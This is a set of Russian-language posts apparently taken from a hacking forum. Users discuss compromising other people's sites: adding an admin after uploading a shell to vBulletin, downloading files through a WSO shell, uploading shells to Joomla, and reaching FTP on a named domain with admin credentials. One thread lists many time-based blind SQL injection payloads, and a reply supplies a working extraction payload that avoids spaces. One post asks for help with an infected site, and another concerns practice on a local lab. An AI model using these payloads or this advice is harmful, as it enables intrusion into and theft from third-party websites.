Залил шелл в vBulletin® Version 4.2.0 каким sql запросом добавить нового админа? хэш действующего сломать не осилил
Всем привет, нашел скулю, но очень она странная. Помогите раскрутить... Ссылку прямую дать не могу Но может кто подскажет варианты, я хочу ее раскрутить: Итак детали : Есть некий сайт, скажем http://site.com Где по следующей ссылке акунетикс нашел скулю блинд скл инжекшн. http://site.com/misc/print_version.php Уязвимость касается POST параметра page was set to /rus/search.php'=sleep(2)=' Полные пост данные: name=blah&page=/rus/search.php'=sleep(2)=' SQLMAP ее не находит. Реакция сервера: 1) sleep(2) - засыпает на 20 секунд. Чтобы заснул на 1 секунду, приходится ставить sleep(0.1) - почему так непонятно 2) пробовал следующие варианты: Не засыпаетИли не засыпает на добавочный слип) page=blah'=sleep(0.2)=' page='=sleep(0.2)=' page=/rus/search.php'=sleep(0.1)= ' page=/rus/search.php'=sleep(0.1)='" AND (BENCHMARK(100000,SHA1(CURRENT_USER))) page=/rus/search.php'=sleep(0.1)='" UNION SELECT (BENCHMARK(100000,SHA1(CURRENT_USER))) -- page=/rus/search.php'=(BENCHMARK(100000,SHA1(CURRENT_USER))) =1" page=/rus/search.php'= (BENCHMARK(100000,SHA1(CURRENT_USER)))=' page=/rus/search.php='=SLEEP(0.1)+(BENCHMARK(100000,SHA1(CUR RENT_USER)))=' page=/rus/search.php'=sleep(0.1)=' AND WHERE (BENCHMARK(100000,SHA1(CURRENT_USER)))=1 page=/rus/search.php'=(IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),1,1)),0)<52),BENCHMARK(900000,SHA1(1)), 1))=' page=/rus/search.php'=sleep(0.1)=' page=/rus/search.php'=A=sleep(0.1)=' page=/rus/search.php'=sleep(sleep(0.1))=' Засыпает, результат ожидаемый page=/rus/search.php='=(BENCHMARK(100000,SHA1(CURRENT_USER)) )=' page=/rus/search.php'=(BENCHMARK(100000,SHA1(CURRENT_USER))) =' page=/rus/search.php'=sleep(0.1)='" page=/rus/search.php'='1'=sleep(0.1)=' page=/rus/search.php'=sleep(0.1)='A'=' page=/rus/search.php'=sleep(0.1)=sleep(0.1)=' page=/rus/search.php'=sleep(sleep(0.1))=' page=/rus/search.php'=(IF(SUBSTRING(USER(),1,4)='root',1,SLEEP(0.1)))=' (пробелов в sleep нет, почемуто античатовский редактор сам его вставляет) Последний вариант конечно позволяет втавить проверку if, но вот вставить полноценный запрос типа select blah from balh не получается, так как если втавить пробел в любое место то слип не происходит. Вобщем поделитесь идеями хотябы, если не сложно как обойти
to jkchief Попробуйте так: Code: page=/rus/search.php'=(if(substring((select(table_name)from(information_schema.tables)where(table_schema!='information_schema')limit/**/0,1),1,1)='a',1,sleep(0.1)))='
Ребят подскажите, что творится? Проблема началась на одном сайте WP, стоит плагин уведомления об каких либо изменениях файлов на сервере. Стали приходить сообщения Changed: wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/1786i Changed: /wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/4d2fi Changed: wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/1786i В общем каждый день и по нескольку раз Пару жней назад такое же началось и на другом сайте... При просмотре, выдает набор цифр, как понимаю закодированно, пытался раскодировать, но выдает китайские символы... Вот несколько текстов, которые находятся по уведомляемым изменениям: Но при каждом уведомлении об изменении текст в файле другой. Что это и как бороться?
Привет там, Есть кто-нибудь, кто знает, как использовать этот подвиг? http://3dwebdesign.org/forum/index.php?showtopic=1113
Об этом можно забыть, просто очередной вебмастер который косит под "знающего". Я правда понятия не имею причем тут RFI он сказал, мне кажется он даже не знает что это. А фраза: "2. Hacker make POST requests to com_installer or com_templates" это люди просто пытались залить шелл через админку. Я уверен, что сайты его взломали через SQL одного из дырявых компонентов. Единственное, что он правильно написал как защитится от практически 95% взломов на Joomle.
Нужно слить все файлы сайта, wordpress. Шелл успешно залит, но с неочень хорошими правами, все заархивировать в один файл не получается (использую wso). мб есть какой нибудь шелл с функцией скачки файлов, чтоб не скачивать все по-одному?
Всем привет, как можно залить шелл на джумалу, кроме как через медиа менеджер и установку расширений ?
Где найти уроки по Взлому сайта? не моя специфика, но почитать на досуге хочу, желательно чтобы было все понятно, до мелочей. Шеллы, и.т.п
вопрос по Joomla 1.5.26 Помогите танкисту: имеется суперадминский доступ к админке (логин, пароль), но файл admin.login.php удалён. Как получить ftp доступ?
Я ж и говорю, что всё было бы очень просто, если бы файл admin.login.php не был удалён. Т.е. сейчас нет никакой возможности попасть в админку: http://mephisto.com.ua/administrator/index.php = 404
Добрый день. Суть такова: нужно в учебных целях посмотреть уязвимости сайтов, сделанные с помощью cms, а я нубец. Подскажите пожалуйста пару атак, которые я смогу сделать на сайт, который будет у меня на денвере сделан с помощью joomla (2.5, но не принципиально). (ну то есть т.к. цели учебные, атаковать я буду себя) Думаю sql инъекция подойдет) И мб посоветуете для изучения уязвимостей какие-то другие цмски? Ну чтоб даже нуб смог провести атаку и понять ее суть, а еще лучше, чтобы в последствии от этой уязвимости избавиться)
